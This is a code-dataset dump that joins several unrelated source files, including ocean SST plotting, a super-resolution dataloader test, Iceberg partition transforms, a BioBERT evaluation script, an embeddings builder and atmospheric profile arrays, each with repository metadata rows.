Performs analysis of the time-series output of sea-surface temperature
(SST).
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani
self.logger.info("\nPlotting SST time series...")
self.logger.info(' Load SST data...')
config = self.config
calendar = self.calendar
mainRunName = config.get('runs', 'mainRunName')
preprocessedReferenceRunName = \
config.get('runs', 'preprocessedReferenceRunName')
preprocessedInputDirectory = config.get('oceanPreprocessedReference',
'baseDirectory')
movingAveragePoints = config.getint('timeSeriesSST',
'movingAveragePoints')
regions = config.getExpression('regions', 'regions')
plotTitles = config.getExpression('regions', 'plotTitles')
regionsToPlot = config.getExpression('timeSeriesSST', 'regions')
regionIndicesToPlot = [regions.index(region) for region in
regionsToPlot]
outputDirectory = build_config_full_path(config, 'output',
'timeseriesSubdirectory')
make_directories(outputDirectory)
dsSST = open_mpas_dataset(fileName=self.inputFile,
calendar=calendar,
variableList=self.variableList,
startDate=self.startDate,
endDate=self.endDate)
yearStart = days_to_datetime(dsSST.Time.min(), calendar=calendar).year
yearEnd = days_to_datetime(dsSST.Time.max(), calendar=calendar).year
timeStart = date_to_days(year=yearStart, month=1, day=1,
calendar=calendar)
timeEnd = date_to_days(year=yearEnd, month=12, day=31,
calendar=calendar)
if self.controlConfig is not None:
baseDirectory = build_config_full_path(
self.controlConfig, 'output', 'timeSeriesSubdirectory')
controlFileName = '{}/{}.nc'.format(
baseDirectory, self.mpasTimeSeriesTask.fullTaskName)
controlStartYear = self.controlConfig.getint(
'timeSeries', 'startYear')
controlEndYear = self.controlConfig.getint('timeSeries', 'endYear')
controlStartDate = '{:04d}-01-01_00:00:00'.format(controlStartYear)
controlEndDate = '{:04d}-12-31_23:59:59'.format(controlEndYear)
dsRefSST = open_mpas_dataset(
fileName=controlFileName,
calendar=calendar,
variableList=self.variableList,
startDate=controlStartDate,
endDate=controlEndDate)
else:
dsRefSST = None
if preprocessedReferenceRunName != 'None':
self.logger.info(' Load in SST for a preprocesses reference '
'run...')
inFilesPreprocessed = '{}/SST.{}.year*.nc'.format(
preprocessedInputDirectory, preprocessedReferenceRunName)
outFolder = '{}/preprocessed'.format(outputDirectory)
make_directories(outFolder)
outFileName = '{}/sst.nc'.format(outFolder)
combine_time_series_with_ncrcat(inFilesPreprocessed,
outFileName, logger=self.logger)
dsPreprocessed = open_mpas_dataset(fileName=outFileName,
calendar=calendar,
timeVariableNames='xtime')
yearEndPreprocessed = days_to_datetime(dsPreprocessed.Time.max(),
calendar=calendar).year
if yearStart <= yearEndPreprocessed:
dsPreprocessedTimeSlice = \
dsPreprocessed.sel(Time=slice(timeStart, timeEnd))
else:
self.logger.warning('Preprocessed time series ends before the '
'timeSeries startYear and will not be '
'plotted.')
preprocessedReferenceRunName = 'None'
self.logger.info(' Make plots...')
for regionIndex in regionIndicesToPlot:
region = regions[regionIndex]
title = '{} SST'.format(plotTitles[regionIndex])
xLabel = 'Time [years]'
yLabel = r'[$\degree$C]'
varName = self.variableList[0]
SST = dsSST[varName].isel(nOceanRegions=regionIndex)
filePrefix = self.filePrefixes[region]
outFileName = '{}/{}.png'.format(self.plotsDirectory, filePrefix)
lineColors = ['k']
lineWidths = [3]
fields = [SST]
legendText = [mainRunName]
if dsRefSST is not None:
refSST = dsRefSST[varName].isel(nOceanRegions=regionIndex)
fields.append(refSST)
lineColors.append('r')
lineWidths.append(1.5)
controlRunName = self.controlConfig.get('runs', 'mainRunName')
legendText.append(controlRunName)
if preprocessedReferenceRunName != 'None':
SST_v0 = dsPreprocessedTimeSlice.SST
fields.append(SST_v0)
lineColors.append('purple')
lineWidths.append(1.5)
legendText.append(preprocessedReferenceRunName)
if config.has_option(self.taskName, 'firstYearXTicks'):
firstYearXTicks = config.getint(self.taskName,
'firstYearXTicks')
else:
firstYearXTicks = None
if config.has_option(self.taskName, 'yearStrideXTicks'):
yearStrideXTicks = config.getint(self.taskName,
'yearStrideXTicks')
else:
yearStrideXTicks = None
timeseries_analysis_plot(config, fields, calendar=calendar,
title=title, xlabel=xLabel, ylabel=yLabel,
movingAveragePoints=movingAveragePoints,
lineColors=lineColors,
lineWidths=lineWidths,
legendText=legendText,
firstYearXTicks=firstYearXTicks,
yearStrideXTicks=yearStrideXTicks)
savefig(outFileName)
caption = 'Running Mean of {} Sea Surface Temperature'.format(
region)
write_image_xml(
config=config,
filePrefix=filePrefix,
componentName='Ocean',
componentSubdirectory='ocean',
galleryGroup='Time Series',
groupLink='timeseries',
thumbnailDescription='{} SST'.format(region),
imageDescription=caption,
imageCaption=caption)
# }}}
# }}}
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| 38.072131
| 79
| 0.577678
| 10,458
| 0.90062
| 0
| 0
| 0
| 0
| 0
| 0
| 3,293
| 0.283586
|
0cf233053cbaff62ed1842427e42c01b9e93c0c4
| 3,682
|
py
|
Python
|
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os.path as osp
import math
import torchvision.utils
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from data import create_dataloader, create_dataset # noqa: E402
from utils import util # noqa: E402
def main():
dataset = 'REDS' # REDS | Vimeo90K | DIV2K800_sub
opt = {}
opt['dist'] = False
opt['gpu_ids'] = [0]
if dataset == 'REDS':
opt['name'] = 'test_REDS'
opt['dataroot_GT'] = '../../datasets/REDS/train_sharp_wval.lmdb'
opt['dataroot_LQ'] = '../../datasets/REDS/train_sharp_bicubic_wval.lmdb'
opt['mode'] = 'REDS'
opt['N_frames'] = 5
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 256
opt['LQ_size'] = 64
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['interval_list'] = [1]
opt['random_reverse'] = False
opt['border_mode'] = False
opt['cache_keys'] = None
opt['data_type'] = 'lmdb' # img | lmdb | mc
elif dataset == 'Vimeo90K':
opt['name'] = 'test_Vimeo90K'
opt['dataroot_GT'] = '../../datasets/vimeo90k/vimeo90k_train_GT.lmdb'
opt['dataroot_LQ'] = '../../datasets/vimeo90k/vimeo90k_train_LR7frames.lmdb'
opt['mode'] = 'Vimeo90K'
opt['N_frames'] = 7
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 256
opt['LQ_size'] = 64
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['interval_list'] = [1]
opt['random_reverse'] = False
opt['border_mode'] = False
opt['cache_keys'] = None
opt['data_type'] = 'lmdb' # img | lmdb | mc
elif dataset == 'DIV2K800_sub':
opt['name'] = 'DIV2K800'
opt['dataroot_GT'] = '../../datasets/DIV2K/DIV2K800_sub.lmdb'
opt['dataroot_LQ'] = '../../datasets/DIV2K/DIV2K800_sub_bicLRx4.lmdb'
opt['mode'] = 'LQGT'
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 128
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['color'] = 'RGB'
opt['data_type'] = 'lmdb' # img | lmdb
else:
raise ValueError('Please implement by yourself.')
util.mkdir('tmp')
train_set = create_dataset(opt)
train_loader = create_dataloader(train_set, opt, opt, None)
nrow = int(math.sqrt(opt['batch_size']))
padding = 2 if opt['phase'] == 'train' else 0
print('start...')
for i, data in enumerate(train_loader):
if i > 5:
break
print(i)
if dataset == 'REDS' or dataset == 'Vimeo90K':
LQs = data['LQs']
else:
LQ = data['LQ']
GT = data['GT']
if dataset == 'REDS' or dataset == 'Vimeo90K':
for j in range(LQs.size(1)):
torchvision.utils.save_image(LQs[:, j, :, :, :],
'tmp/LQ_{:03d}_{}.png'.format(i, j), nrow=nrow,
padding=padding, normalize=False)
else:
torchvision.utils.save_image(LQ, 'tmp/LQ_{:03d}.png'.format(i), nrow=nrow,
padding=padding, normalize=False)
torchvision.utils.save_image(GT, 'tmp/GT_{:03d}.png'.format(i), nrow=nrow, padding=padding,
normalize=False)
if __name__ == "__main__":
main()
| 35.066667
| 99
| 0.528246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,265
| 0.343563
|
0cf243e0f912db385063a422e6bbf35dbe9d0972
| 3,663
|
py
|
Python
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 58
|
2019-09-10T20:51:26.000Z
|
2022-03-22T11:06:09.000Z
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 292
|
2019-07-23T04:33:18.000Z
|
2021-07-26T04:28:22.000Z
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 26
|
2019-08-28T23:59:03.000Z
|
2022-03-04T08:54:08.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from .bucket import Bucket
from .dates import Dates
from .identity import Identity
from .timestamps import Timestamps
from .truncate import Truncate
from ..types import (TypeID)
"""
Factory methods for transforms.
<p>
Most users should create transforms using a
{@link PartitionSpec.Builder#builderFor(Schema)} partition spec builder}.
@see PartitionSpec#builderFor(Schema) The partition spec builder.
"""
class Transforms(object):
HAS_WIDTH = re.compile("(\\w+)\\[(\\d+)\\]")
def __init__(self):
pass
@staticmethod
def from_string(type_var, transform):
match = Transforms.HAS_WIDTH.match(transform)
if match is not None:
name = match.group(1)
w = int(match.group(2))
if name.lower() == "truncate":
return Truncate.get(type_var, w)
elif name.lower() == "bucket":
return Bucket.get(type_var, w)
if transform.lower() == "identity":
return Identity.get(type_var)
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps(transform.lower(), transform.lower())
elif type_var.type_id == TypeID.DATE:
return Dates(transform.lower(), transform.lower())
raise RuntimeError("Unknown transform: %s" % transform)
@staticmethod
def identity(type_var):
return Identity.get(type_var)
@staticmethod
def year(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("year", "year")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("year", "year")
else:
raise RuntimeError("Cannot partition type %s by year" % type_var)
@staticmethod
def month(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("month", "month")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("month", "month")
else:
raise RuntimeError("Cannot partition type %s by month" % type_var)
@staticmethod
def day(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("day", "day")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("day", "day")
else:
raise RuntimeError("Cannot partition type %s by day" % type_var)
@staticmethod
def hour(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("hour", "hour")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("hour", "hour")
else:
raise RuntimeError("Cannot partition type %s by hour" % type_var)
@staticmethod
def bucket(type_var, num_buckets):
return Bucket.get(type_var, num_buckets)
@staticmethod
def truncate(type_var, width):
return Truncate.get(type_var, width)
| 32.705357
| 78
| 0.65329
| 2,449
| 0.668578
| 0
| 0
| 2,289
| 0.624898
| 0
| 0
| 1,305
| 0.356265
|
0cf5f33e0cfd554440d95e9093a443f85242c9cf
| 3,067
|
py
|
Python
|
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | null | null | null |
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | 3
|
2020-11-13T17:48:47.000Z
|
2022-02-09T23:43:16.000Z
|
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import numpy as np
import pandas as pd
import sklearn.metrics
import sklearn.metrics
parser = argparse.ArgumentParser(description='')
parser.add_argument('--output_path', type=str, help='')
parser.add_argument('--answer_path', type=str, help='')
parser.add_argument('--task', type=str, default="binary", help='default:binary, possible other options:{chemprot}')
args = parser.parse_args()
testdf = pd.read_csv(args.answer_path, sep="\t")
preddf = pd.read_csv(args.output_path, sep="\t", header=None)
# binary
if args.task == "binary":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
pred_prob_one = [v[1] for v in pred]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=testdf["label"])
results = dict()
results["f1 score"] = f[1]
results["recall"] = r[1]
results["precision"] = p[1]
results["specificity"] = r[0]
# chemprot
# micro-average of 5 target classes
# see "Potent pairing: ensemble of long short-term memory networks and support vector machine for chemical-protein relation extraction (Mehryary, 2018)" for details
if args.task == "chemprot":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
for i, v in enumerate(sorted(testdf["label"].unique())):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
if args.task == "N2C2":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
labels = ["Reason-Drug", "Route-Drug", "Strength-Drug", "Frequency-Drug", "Duration-Drug", "Form-Drug", "Dosage-Drug", "ADE-Drug"]
for i, v in enumerate(labels):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
# print(sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8], average="none"))
for i, label in enumerate(labels):
print(label + " result")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[i], average="macro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
print('\n')
print('total' + " result\n")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
| 41.445946
| 164
| 0.661559
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 847
| 0.276166
|
0cf776032667c66aa9047465a936c18e4c0e130b
| 99
|
py
|
Python
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 2
|
2019-09-23T01:55:46.000Z
|
2019-11-08T16:33:47.000Z
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 1
|
2019-10-07T01:11:55.000Z
|
2019-10-07T01:11:55.000Z
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 1
|
2019-09-24T06:22:30.000Z
|
2019-09-24T06:22:30.000Z
|
from django.apps import AppConfig
class ChainlicenseConfig(AppConfig):
name = 'ChainLicense'
| 16.5
| 36
| 0.777778
| 62
| 0.626263
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.141414
|
0cf9f78c1ecb148ea8cc9e86512596f09bae6846
| 1,403
|
py
|
Python
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 6
|
2016-10-10T09:26:07.000Z
|
2018-09-20T08:59:42.000Z
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 11
|
2016-10-10T12:11:07.000Z
|
2018-05-09T22:11:02.000Z
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 16
|
2016-09-28T16:00:58.000Z
|
2019-02-25T16:52:12.000Z
|
# Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
from os.path import join
import unittest
from mock import patch
from agent.find_deployment import find_deployment_dir_win
class Fake(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class TestFindDeployment(unittest.TestCase):
def test_find_deployment_dir_win_finds_none_returns_none(self):
with patch('agent.find_deployment.exists', return_value=False):
expected = None
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
def test_find_deployment_dir_win_finds_both_returns_new(self):
with patch('agent.find_deployment.exists', return_value=True):
expected = join('/deployments', 'my_service', 'my_deployment_id')
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
def test_find_deployment_dir_win_finds_old_returns_old(self):
expected = join('/deployments', 'my_deployment_id')
with patch('agent.find_deployment.exists', lambda x: x == expected):
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
| 48.37931
| 127
| 0.726301
| 1,149
| 0.818959
| 0
| 0
| 0
| 0
| 0
| 0
| 425
| 0.302922
|
0cfa89782c8d3290c0c6ceba7319a0449a110fed
| 2,585
|
py
|
Python
|
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | null | null | null |
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | null | null | null |
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | 1
|
2019-12-03T00:29:14.000Z
|
2019-12-03T00:29:14.000Z
|
import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
class EmbeddingsBuilder:
def __init__(self, args):
logging.info('initializing...')
self.args = args
self.dataset = DataLoader(self.args)
self.embeddings_path = args.embeddings_path
self.small_embeddings_path = os.path.splitext(self.embeddings_path)[0] + '_small.vec'
logging.info('initializing...[ok]')
def build_embedding(self, vocab_dict):
"""
Load embedding vectors from a .txt file.
Optionally limit the vocabulary to save memory. `vocab` should be a set.
"""
num_words = len(vocab_dict)
num_found = 0
with open(self.small_embeddings_path, 'w') as out_file:
with tf.gfile.GFile(self.embeddings_path) as f:
header =next(f)
num_embeddings, embeddings_dim = header.split(' ')
num_embeddings = int(num_embeddings)
out_file.write(header)
for _, line in tqdm(enumerate(f), 'loading embeddings', total=num_embeddings):
tokens = line.rstrip().split(" ")
word = tokens[0]
if word in vocab_dict:
num_found += 1
out_file.write(line)
tf.logging.info("Found embeddings for {} out of {} words in vocabulary".format(num_found, num_words))
def run(self):
self.dataset.load()
X = self.dataset.X_train_labeled['moment'].values
X = np.append(X, self.dataset.X_train_unlabeled['moment'].values, axis=0)
X = np.append(X, self.dataset.X_test['moment'].values, axis=0)
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
self.build_embedding(tokenizer.word_index)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
logging.info('initializing task...')
parser = argparse.ArgumentParser()
parser.add_argument('--data-dir', default='data/claff-happydb')
parser.add_argument('--embeddings-path', type=str, default=None)
parser.add_argument('--num-unlabeled', type=int, default=1000)
parser.add_argument('--use-allfeats', action='store_true', default=False)
parser.add_argument('--predict', action='store_true', default=True)
builder = EmbeddingsBuilder(args=parser.parse_args())
builder.run()
logging.info('task finished...[ok]')
| 31.91358
| 109
| 0.635977
| 1,729
| 0.668859
| 0
| 0
| 0
| 0
| 0
| 0
| 501
| 0.19381
|
0cfa9b70f4dd085778dfa0f986d2747b6f89ea72
| 430
|
py
|
Python
|
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | null | null | null |
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | null | null | null |
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | 1
|
2021-11-04T21:48:14.000Z
|
2021-11-04T21:48:14.000Z
|
#############################################################################
#
# Author: Michel F. SANNER
#
# Copyright: M. Sanner and TSRI 2015
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/mglkeyDIST/mglkey/__init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
# $Id: __init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
from mglkey import MGL_check_key
| 30.714286
| 106
| 0.448837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.895349
|
0cfc5802ff58618fd079fd5185d9edd8be7eda97
| 13,342
|
py
|
Python
|
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | null | null | null |
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | 1
|
2022-03-12T12:19:59.000Z
|
2022-03-12T12:19:59.000Z
|
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Profile ../profile-datasets-py/div83/027.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/027.py"
self["Q"] = numpy.array([ 1.51831800e+00, 2.02599600e+00, 2.94787100e+00,
3.99669400e+00, 4.71653800e+00, 4.89106600e+00,
5.14399400e+00, 5.67274800e+00, 6.02338400e+00,
6.09836300e+00, 6.08376300e+00, 6.01126400e+00,
5.91866500e+00, 5.77584700e+00, 5.59481900e+00,
5.41637100e+00, 5.26750200e+00, 5.10689400e+00,
4.98576500e+00, 4.90039600e+00, 4.80689700e+00,
4.63989800e+00, 4.46443000e+00, 4.30135100e+00,
4.16606300e+00, 4.06766300e+00, 4.01361400e+00,
3.95640400e+00, 3.87825500e+00, 3.79394600e+00,
3.73623600e+00, 3.72919600e+00, 3.74067600e+00,
3.78187600e+00, 3.81900500e+00, 3.85233500e+00,
3.88512500e+00, 3.91148500e+00, 3.92466500e+00,
3.92849500e+00, 3.93905400e+00, 3.97355400e+00,
4.02951400e+00, 4.05710400e+00, 4.04558400e+00,
4.02228400e+00, 4.01040400e+00, 4.00572400e+00,
4.00641400e+00, 4.08608300e+00, 4.44130000e+00,
5.00126500e+00, 5.73600700e+00, 6.83860300e+00,
8.34002000e+00, 9.95999100e+00, 1.13537700e+01,
1.24435500e+01, 1.36048100e+01, 1.55239600e+01,
1.77784800e+01, 1.93991200e+01, 2.00516000e+01,
1.97941100e+01, 1.89638400e+01, 1.84148600e+01,
1.82331700e+01, 1.84861600e+01, 2.02668900e+01,
3.24805400e+01, 6.31028200e+01, 1.09865900e+02,
1.71694500e+02, 2.41407700e+02, 3.05073900e+02,
3.60772800e+02, 4.04902000e+02, 4.16543400e+02,
4.04623200e+02, 3.59892400e+02, 3.06567000e+02,
3.03443900e+02, 4.25764600e+02, 8.75110500e+02,
1.60701300e+03, 2.52645100e+03, 3.50894400e+03,
4.39830900e+03, 5.05090900e+03, 5.40195000e+03,
5.54486300e+03, 5.86218200e+03, 6.10752900e+03,
6.83105600e+03, 6.63557500e+03, 6.44820100e+03,
6.26853800e+03, 6.09616900e+03, 5.93072700e+03,
5.77187200e+03, 5.61926500e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.9234, 375.9232, 375.9219, 375.9195, 375.9172, 375.9142,
375.9041, 375.8819, 375.8607, 375.8617, 375.8997, 375.9717,
376.0398, 376.0858, 376.1489, 376.212 , 376.224 , 376.2321,
376.2481, 376.2772, 376.3252, 376.3663, 376.4023, 376.4224,
376.4504, 376.4865, 376.5545, 376.6335, 376.7605, 376.8966,
377.0446, 377.2036, 377.3766, 377.5606, 377.7106, 377.8485,
378.0765, 378.4945, 378.9365, 379.6475, 380.4225, 381.0245,
381.4085, 381.8025, 381.8315, 381.8625, 381.8985, 381.9405,
381.9845, 382.0364, 382.0903, 382.5651, 383.1618, 383.8894,
384.7668, 385.5962, 386.1156, 386.6532, 386.7607, 386.854 ,
386.8701, 386.8645, 386.8732, 386.8913, 386.9157, 386.9449,
386.9669, 386.9788, 386.9602, 386.9034, 386.8186, 386.7075,
386.6086, 386.5187, 386.4681, 386.4315, 386.4595, 386.5189,
386.6375, 386.8447, 387.1073, 387.3124, 387.433 , 387.3937,
387.2297, 386.9659, 386.6525, 386.3522, 386.1188, 385.9826,
385.9361, 385.8209, 385.7317, 385.4548, 385.5337, 385.6074,
385.6771, 385.744 , 385.8082, 385.8699, 385.9291])
self["CO"] = numpy.array([ 0.2205447 , 0.2185316 , 0.2145434 , 0.2078282 , 0.1977631 ,
0.1839901 , 0.1511932 , 0.09891954, 0.0827345 , 0.05454007,
0.02926452, 0.01534331, 0.01021024, 0.00922827, 0.00895567,
0.00841368, 0.00791632, 0.0076217 , 0.00749041, 0.00745301,
0.00740799, 0.00741502, 0.00746624, 0.00760092, 0.00775626,
0.00793258, 0.0081303 , 0.00834271, 0.00844155, 0.00854593,
0.00861921, 0.00869836, 0.00895125, 0.009236 , 0.00956421,
0.00993273, 0.01050776, 0.01155325, 0.01277055, 0.01483604,
0.01745463, 0.02009092, 0.02248201, 0.0252159 , 0.0250677 ,
0.0249136 , 0.0248554 , 0.0248671 , 0.0248747 , 0.0248604 ,
0.02484549, 0.02830606, 0.03349511, 0.03954063, 0.04649641,
0.05393566, 0.05777834, 0.06203953, 0.06291754, 0.06367061,
0.06376177, 0.06365417, 0.06355173, 0.06345124, 0.063449 ,
0.06353453, 0.06376724, 0.06416551, 0.06445159, 0.0646028 ,
0.06451203, 0.06417925, 0.06369376, 0.06310236, 0.06261609,
0.06216137, 0.06196 , 0.06180874, 0.06178709, 0.06208905,
